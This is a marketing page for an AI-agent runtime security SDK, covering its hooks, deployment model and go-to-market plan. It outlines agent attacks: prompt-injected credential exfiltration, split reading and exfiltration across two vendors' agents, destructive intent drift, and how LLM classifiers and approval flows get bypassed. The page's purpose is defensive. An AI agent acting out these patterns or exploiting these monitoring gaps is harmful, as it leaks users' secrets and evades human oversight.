Runtime Behavioral Security for AI Agents

The pause between intent and action.

Agent threats live at the semantic layer — which tools got called, which files got read, whether behavior matches stated intent. That's only visible in-process. Sentinel ships as a hooks-based SDK that enforces deterministic security checks at the moments that matter.

"The thing protecting you does not inherit the failure modes of the thing it's protecting."
No tokens · No external API · No LLM in the monitoring pipeline · $0 runtime cost · On-prem by default · Policy-less out of the box
Attack Demos: 6 · runnable live, not slides
Checkpoints: 4 · deterministic hooks across every agent action
SDK Modules: 27 · cross-vendor, no platform dependency
Runtime Cost: $0 · fully local, no tokens consumed

Architecture validated by Palo Alto Networks:
"If I had spare time, I would build that."
— Director of Engineering, AI Security · Palo Alto Networks

Every existing safety tool is either locked to one vendor or built on the same AI it's meant to protect. Nobody has built an independent, cross-vendor, deterministic agent security layer. The company that does owns the governance category.


// The Problem · Three Failure Modes
Intent Drift

User asked. Agent did something else.

User: summarize this code
Agent: rm -rf ./src

No vendor's safety layer can compare intent to action. The platform never knew what the user asked for.

Boundary Violation

Agent reads what it shouldn't.

.env · ~/.ssh/id_rsa
/etc/production

Each vendor's safety ends at its own session boundary. Anything outside is invisible — and exfiltratable.

Cross-Vendor

Two agents. One attack.

Claude reads credentials.
30s later
Cursor exfiltrates.

No platform sees both halves. The attack lives in the seam between vendors that don't talk to each other.


// The Architecture

Policy-less by default. Four deterministic checkpoints.

Sentinel ships policy-less out of the box. No YAML to write. No rules to configure. Behavioral baselines do the work — Sentinel learns what normal looks like and flags what isn't. For teams that want explicit control, a single YAML file adds custom policy on top of the baseline. But the default state is zero configuration beyond install.

Hooks block, allow, or guide. No probabilistic classifiers. No LLM judgment calls. Deterministic enforcement at every checkpoint — the only architecture that can make a hard security guarantee.

"A security guard that can be talked into unlocking the vault." That's what an LLM in the security pipeline is.
01 · pre_prompt — intent capture
02 · pre_execution — action gate
03 · post_execution — drift detection
04 · mcp_call — tool boundary

The flow: the agent runtime (any vendor) carries the user prompt — the stated intent — into LLM reasoning, which decides the tool and target. Sentinel's deterministic enforcement layer sits between that decision and execution, evaluating every action at the four checkpoints against the behavioral baseline (rolling window) and 25 sensitivity rules (optional YAML on top). ALLOW passes the action through to tool execution: file · API · command · MCP. BLOCK triggers enforcement escalation: restrict → quarantine → audit.

No LLM in the monitoring pipeline · $0 runtime cost · append-only SHA-256 audit trail
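
In code, the architecture is four hook registrations. A minimal sketch (the checkpoint names are Sentinel's; the agent id and callback bodies are illustrative, not the SDK's actual surface):

const sentinel = await Sentinel.init('coding-agent')

// 01 · capture the user's stated intent for later comparison
sentinel.on('coding-agent', 'pre_prompt', (ctx) => { /* record intent */ })

// 02 · gate the action before it runs: allow | block | guide
sentinel.on('coding-agent', 'pre_execution', (ctx) => { /* evaluate action */ })

// 03 · compare what ran against what was asked
sentinel.on('coding-agent', 'post_execution', (ctx) => { /* score drift */ })

// 04 · evaluate MCP tool calls at the tool boundary
sentinel.on('coding-agent', 'mcp_call', (ctx) => { /* check tool + target */ })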

// Deployment

On-prem by default. Your infrastructure, your keys, your data.

Sentinel runs entirely in-process. No data leaves your environment. No external API calls. No cloud dependency. BYOK — your team pays infrastructure costs directly to your LLM providers. Sentinel never touches your keys, your credentials, or your agent data.

On-premises · BYOK · Zero data egress · In-process SDK · No SaaS dependency

Enterprise security teams won't trust SaaS with security data at this stage. We know. Sentinel was built for that reality from day one — no hosted component, no data retention, no sub-processor disclosures required.


// For Security Leaders

What Sentinel actually prevents.

No code required to understand this section. If your organization is deploying AI agents in production — Cursor, Claude Code, internal LangChain agents, MCP tools — here's what changes with Sentinel installed.

Credential exfiltration

Agents compromised by prompt injection read .env files, SSH keys, and production secrets — then POST them externally. Sentinel blocks the file read before it executes. The credential is never seen.

Cross-vendor coordination attacks

Agent A reads credentials. Agent B exfiltrates 30 seconds later. No single vendor sees both halves. Sentinel monitors all agents from one layer, regardless of vendor, and correlates behavior across the fleet.

Intent drift

"Summarize this code" becomes "delete the source directory." Sentinel scores every action against the declared task. When alignment drops, enforcement kicks in — before the destructive action runs.

Compliance audit trail

Every agent action is logged to an append-only, SHA-256 hash-chained audit trail. Structured for SOC 2, GDPR, HIPAA, and EU AI Act. When the auditor asks "what did your agents do," you hand them a report — not a shrug.

Deployment model

On-premises. In-process. BYOK. No data leaves your environment. No hosted component. No SaaS trust questions. No sub-processor disclosures. Your infrastructure, your keys, your control. Sentinel installs as an npm package and configures from a single YAML file — or runs policy-less with behavioral baselines active from minute one.


// The Numbers
80%+
Attack success rate for behavioral control traps across five real agent frameworks. Shapira et al. (2025), cited in Franklin et al., "AI Agent Traps," Google DeepMind, 2026: web-use agents driven to exfiltrate local files, passwords, and secrets via task-aligned injections.
4 of 4
Sentinel detection layers caught the attack independently in a live LLM demo — real Claude Sonnet 4 agent, poisoned file, no scripted behavior. Side by side, the vulnerable agent reads .env.production and POSTs it externally across three consecutive runs; the Sentinel-protected agent, on identical prompts, is blocked at every layer independently.
48%
of cybersecurity professionals rank agentic AI as the #1 attack vector for 2026. Above phishing. Above ransomware. Above supply chain. The attack surface grew before the security layer existed.
0
Published NIST AI agent security standards. No finalized standards exist. Companies that build audit infrastructure now arrive at compliance ahead of the mandate, with 12 months of data already in place when requirements land.
// Deadline

EU AI Act — August 2, 2026

Automatic logging required for high-risk AI. Penalty: up to €35M or 7% of global revenue.

// Market Signal

Palo Alto Prisma AIRS 3.0

Announced at RSA 2026. Agent security is now a board-level priority — the window to move first is closing.


// Why Existing Tools Fail

01 — Vendor-locked safety ends at the session boundary.

Claude's safety layer knows nothing about what Cursor did five minutes ago. Each vendor protects their own surface — and most enterprises run more than one agent. Cross-vendor coordination attacks are invisible to existing tools. Sentinel monitors all agents from a single layer.
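
Correlating the two halves requires no model in the loop; it is set intersection over a time window. A sketch under assumed event shapes (kind, agentId, and ts are illustrative field names, and the 60-second window mirrors the demo above):

// Did any agent POST externally shortly after a *different* agent read credentials?
function seesCrossVendorExfil(events, windowMs = 60_000) {
  const reads = events.filter((e) => e.kind === 'credential_read')
  return events
    .filter((e) => e.kind === 'network_write')
    .some((send) =>
      reads.some((read) =>
        read.agentId !== send.agentId &&   // e.g. Claude reads, Cursor sends
        send.ts > read.ts &&
        send.ts - read.ts < windowMs
      )
    )
}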

02 — LLM classifiers inherit the failure mode they were built to stop.

The dominant approach runs an LLM to classify whether a prompt is dangerous. A prompt injection that gets through the agent also gets through the classifier. You're using the compromised surface to evaluate itself. Sentinel has no LLM in the monitoring pipeline. Deterministic enforcement cannot be prompt-injected.

03 — Sandboxes contain blast radius. They're blind to intent drift inside the box.

Sandbox tools give agents isolated execution environments. They cannot tell you that the agent inside is doing something different from what the user asked. A monitoring tool is a security camera. Sentinel's pre_execution hook is a locked door.
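
Intent-to-action comparison, by contrast, can be fully deterministic. An illustrative token-overlap score (not Sentinel's actual scorer):

// Fraction of the action's tokens that appear in the declared task.
function alignmentScore(intent, action) {
  const tokens = (s) => new Set(s.toLowerCase().split(/\W+/).filter(Boolean))
  const task = tokens(intent)
  const act = [...tokens(action)]
  return act.length ? act.filter((w) => task.has(w)).length / act.length : 1
}

alignmentScore('summarize this code', 'rm -rf ./src')  // 0: zero overlap, enforce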

04 — Policy-based tools suffer death by a thousand cuts.

Traditional security products require manual policy configuration. Policies get out of date. They require constant maintenance. They create friction developers route around. Sentinel ships policy-less by default — behavioral baselines do the work instead of manual policy management.


// How It Works
Step 01 // Install

One command. No account.

Install the SDK from npm. Fully local — your data never leaves your environment. No cloud signup. No procurement cycle.

# Install
$ npm install @tuent/sentinel

// Initialize — policy-less, behavioral baseline active
import { Sentinel } from '@tuent/sentinel'
const sentinel = await Sentinel.init('agent-id')
Step 02 // Run (policy-less)

Sentinel observes immediately.

25 built-in sensitivity rules block credentials, SSH keys, and system files automatically. Behavioral baselines build over 30 days. No YAML required.

// Sentinel learns what normal looks like.
// No policy file. No configuration. Just install and run.
// .env, .ssh, /etc — blocked automatically.

// Optional: add explicit policy when you want it
const sentinel = await Sentinel.fromPolicy('.sentinel.yaml')

Optional — when your team wants explicit control:

# .sentinel.yaml — single file, full configuration
agent:
  id: coding-agent
  role: AI Coding Assistant
policy:
  allow:
    actions: [file_read, file_write]
    targets: ["src/**", "docs/**"]
  # .env, SSH, /etc — blocked automatically.
enforcement:
  restrictAfter: 2
  quarantineAfter: 3
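
For intuition, the built-in sensitivity rules reduce to deterministic path checks of this general shape. A hypothetical sketch, not the shipped rule set (the ctx fields and the block return value are assumptions):

// Hypothetical pre_execution hook: pure regex matching, nothing to prompt-inject.
const SENSITIVE = [/\.env(\..+)?$/, /(^|\/)\.ssh\//, /^\/etc\//]

sentinel.on(agentId, 'pre_execution', (ctx) => {
  // Assumed ctx shape: { action: 'file_read', target: '/path/to/file' }
  if (ctx.action === 'file_read' && SENSITIVE.some((r) => r.test(ctx.target))) {
    return 'block'  // the read never executes; nothing to exfiltrate
  }
})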
Step 03 // Enforce

Register hooks. Block before execution.

Hook into any checkpoint. Sentinel evaluates the action before it executes. Violations escalate automatically: restricted at 2, quarantined at 3.

sentinel.on(agentId, 'pre_execution', (ctx) => {
  // ctx.evaluationResult → allow | block | guide
  // Behavioral baseline handles the defaults.
  // Add hooks for application-specific policy.
})
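
The escalation ladder is a pure function of the violation count. An illustrative version matching the defaults above (the state names are assumptions):

function escalationState(violations) {
  if (violations >= 3) return 'quarantine'   // quarantineAfter: 3
  if (violations >= 2) return 'restrict'     // restrictAfter: 2
  return 'observe'                           // log to the audit trail only
}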

// How Sentinel Compares

Three things enterprises actually do today to mitigate agent risk — and where each one stops working.

Claude Auto Mode
  What it does: ask-before-acting approval flow within one vendor's agent
  Cross-vendor: no — Claude only
  Sees intent drift: no — no comparison of intent to action
  Blocks before execution: sometimes — approval fatigue bypasses it
  LLM in security layer: yes — the LLM polices itself
  Behavioral baseline: no
  Deployment: built-in (vendor lock-in)
  Configuration: vendor-defined, limited customization
  Runtime cost: tokens for approval flow
  Audit trail: vendor logs only

Sandbox (Docker, E2B)
  What it does: isolates agent execution to limit blast radius
  Cross-vendor: partial — per-container
  Sees intent drift: no — blind inside the sandbox
  Blocks before execution: no — contains damage after the fact
  LLM in security layer: no
  Behavioral baseline: no
  Deployment: infra team manages containers
  Configuration: container policies, network rules
  Runtime cost: compute per container
  Audit trail: container logs — unstructured

LLM Classifiers (Lakera, etc.)
  What it does: scans prompts and outputs for malicious content
  Cross-vendor: partial — per-model
  Sees intent drift: partial — prompt-level only
  Blocks before execution: no — scans at submission, not runtime
  LLM in security layer: yes — inherits the prompt injection surface
  Behavioral baseline: no
  Deployment: SaaS API — data leaves your environment
  Configuration: hundreds of rules, manual maintenance
  Runtime cost: tokens per classification call
  Audit trail: classification logs

Sentinel
  What it does: wraps every agent action with deterministic hooks, cross-vendor
  Cross-vendor: yes — one SDK, all agents
  Sees intent drift: yes — scores every action against the declared task
  Blocks before execution: yes — the pre_execution hook fires before the action runs
  LLM in security layer: no — fully deterministic
  Behavioral baseline: yes — per-agent, 30-day rolling window
  Deployment: npm install. On-prem. BYOK. 10 minutes.
  Configuration: policy-less by default. Optional YAML.
  Runtime cost: $0 — no external API, no tokens
  Audit trail: append-only, SHA-256 hash-chained. SOC 2, EU AI Act.
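
On the audit-trail row: a hash-chained log is cheap to produce and cheap to verify. A minimal Node sketch (illustrative entry format, not Sentinel's actual schema):

import { createHash } from 'node:crypto'

// Each entry commits to the previous hash, so editing any past record
// invalidates every hash after it. Append-only by construction.
function appendEntry(chain, event) {
  const prev = chain.length ? chain[chain.length - 1].hash : 'GENESIS'
  const payload = JSON.stringify({ prev, event, ts: Date.now() })
  chain.push({ payload, hash: createHash('sha256').update(payload).digest('hex') })
  return chain
}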

// The Secret Sauce

Every competitor builds the observation layer from scratch. Tuent already had one.

Sentinel's enforcement logic sits on top of a complete behavioral observation engine — session classification, deviation detection, rolling baselines, cross-vendor data model. That engine was production-tested on human behavior for months before it ever touched an agent. Porting it took two weeks.

That's the moat. Not speed. Not a team. An observation foundation that any company entering this category has to build before they can ship their first line of enforcement logic. By the time they have it, Sentinel has 12 months of behavioral data inside customer environments.

Test Suite: 1,108 tests
SDK Modules: 27
Sensitivity Rules: 25 built-in
Time to Port: 2 weeks (humans → agents)

// What's Built · Capability, Not Commercial
Live Attack Demos: 6
Hook Checkpoints: 4
SDK Modules: 27
Tests Passing: 1,108

This is capability traction, not commercial traction. Commercial traction is what we're raising to build next —
a design-partner cohort of five named enterprise security and AI-platform teams deploying agents in production.


// Founding Story

We spent months building a system that watched developer filesystem activity and rendered behavior as a living data structure. We thought we were building a productivity tool.

A semiconductor executive deploying AI at scale interrupted a demo fifteen minutes in: the same observation layer would work on agents, and no one was building it. Companies that had rolled out Cursor or Claude Code were running thousands of agents in production with no behavioral monitoring. The existing tools were vendor-locked, LLM-based, or blind to intent.

"The same observation layer would work on AI agents — and no one is doing it."
// The founding moment

Best friends since high school. Second venture together. Roles swapped. Charlie built the core codebase — hooks engine, evaluation pipeline, framework adapters — in three weeks. James leads GTM, business development, and partnership strategy. Same team, different seats, sharper the second time.

"We're not asking you to bet on potential. We're asking you to bet on the second rep."


// Why Free Is the Right First Move

Enterprise security is bought top-down: CISO mandate, procurement cycle, six-month deployment. That requires the problem to already be board-acknowledged. It isn't yet — not for AI agents.

The way this market gets built is bottom-up. A developer installs Sentinel, hooks their agent, and has enforcement running in 10 minutes. They demo it in a PR review. The team lead asks for shared visibility. The VP Engineering asks for SSO and compliance exports. The enterprise deal closes itself — and by then, Sentinel has 12 months of behavioral baselines no competitor can replicate without starting over. Sentinel is at step zero of this motion. The free SDK is the entry point.

// Phase 01

Individual Developer

npm install. Hooks their agent. Enforcement running in 10 minutes. Free, no account. Policy-less — behavioral baselines active immediately.

Trigger: demo in a PR review. Team sees it working.
// Phase 02

Team Lead

Asks for fleet visibility. Alerts in Slack. One dashboard across all agents.

Trigger: second agent incident in the same week.
// Phase 03

VP Engineering / CISO

SSO, compliance exports, policy repository, SLA. Procurement opens. Deal closes itself.

Trigger: SOC 2 audit, EU AI Act, or board security review.
// Pilot Structure

Free pilot. BYOK. Clear boundaries.

Customers cover their own infrastructure costs via bring-your-own-key. Clear data disclosure and LOI required. Minimum 1 month for meaningful evaluation — enterprise cycles can extend to 6 months. Pricing flexibility matters more than revenue at this stage.

// Sales Cycle

Enterprise security sells in months, not weeks.

Sales cycles of up to 6 months are typical for enterprise security products. The free SDK compresses the bottom-up adoption cycle. By the time procurement opens, Sentinel has months of behavioral data the buyer can't get from a fresh install of a competitor.

// First User

Director of Security Engineering or Head of AI Platform at a company deploying AI agents in production. Trigger event: an agent did something unexpected, unauthorized, or destructive — and leadership wants to know how to prevent it.


// Why This Compounds
Data Gravity

Baselines are the moat.

Sentinel gets more accurate with every day it monitors an agent. Behavioral baselines built over 30 days catch deviations a new deployment misses. Switching means losing months of behavioral history — and starting blind again.
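
Mechanically, the check is classic anomaly detection over per-agent history; the value is the history feeding it. A sketch with illustrative parameters (the window size and 3-sigma threshold are assumptions, not the shipped defaults):

// Flag today's activity if it sits far outside the agent's rolling norm.
function deviates(window, today, sigmas = 3) {
  const mean = window.reduce((s, n) => s + n, 0) / window.length
  const sd = Math.sqrt(window.reduce((s, n) => s + (n - mean) ** 2, 0) / window.length)
  return Math.abs(today - mean) > sigmas * Math.max(sd, 1)  // guard sd = 0
}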

Regulatory Tailwind

Early movers win compliance.

EU AI Act deadline is August 2026. NIST frameworks are coming. Companies running Sentinel now arrive at compliance with a year of audit history already built — for free.

Architecture Advantage

Determinism can't be retrofitted.

LLM-based competitors cannot remove the LLM from their pipeline without rebuilding their product. Sentinel's deterministic hooks were designed in from day one. That's not a feature gap — it's structural.


// The Window

Now — 2026

The breach window is open. 88% of orgs already report incidents. Standards don't exist. Monitoring is sparse. Companies who deploy Sentinel now build 12+ months of behavioral baselines before compliance becomes mandatory.

August 2, 2026

EU AI Act automatic logging requirement activates. Penalty: up to €35M or 7% of global revenue. Sentinel customers hand auditors structured compliance reports. Everyone else scrambles.

2026–2027

NIST standards formalize. Market consolidates. Enterprise buyers standardize on 2–3 vendors. Developer-first tools with the deepest behavioral data win. Baselines become the product.

Too Late

The breach that sets the precedent. One high-profile AI agent incident changes every procurement conversation permanently. "Why didn't you have monitoring?" has no good answer.


// Recent · Last 30 Days
Apr 27
Architecture validated by Director of Engineering, AI Security at Palo Alto Networks — confirmed on-prem/BYOK, policy-less UX, and CISO intro pathway.
Apr 26
BVA pitch competition submission shipped — deck, video, teleprompter script delivered on hard deadline.
Apr 15
Shipped hooks-based architecture per advisor recommendation — replaces wrapper middleware with deterministic checkpoints.
Apr 11
Sent comprehensive Sentinel technical brief to Director of Engineering at top-5 enterprise security vendor, who manages 3,500+ developers on Claude.
Apr 09
Tuent v28 brand and product system shipped — editorial discipline, code-native lockup.

See what your agents have already done.

Free while we build the design-partner cohort. No tiers. No contracts. Direct founder access.

"We're not asking you to bet on potential. We're asking you to bet on the second rep."
Request Free Access
// Free during beta · On-prem · Policy-less · Direct founder access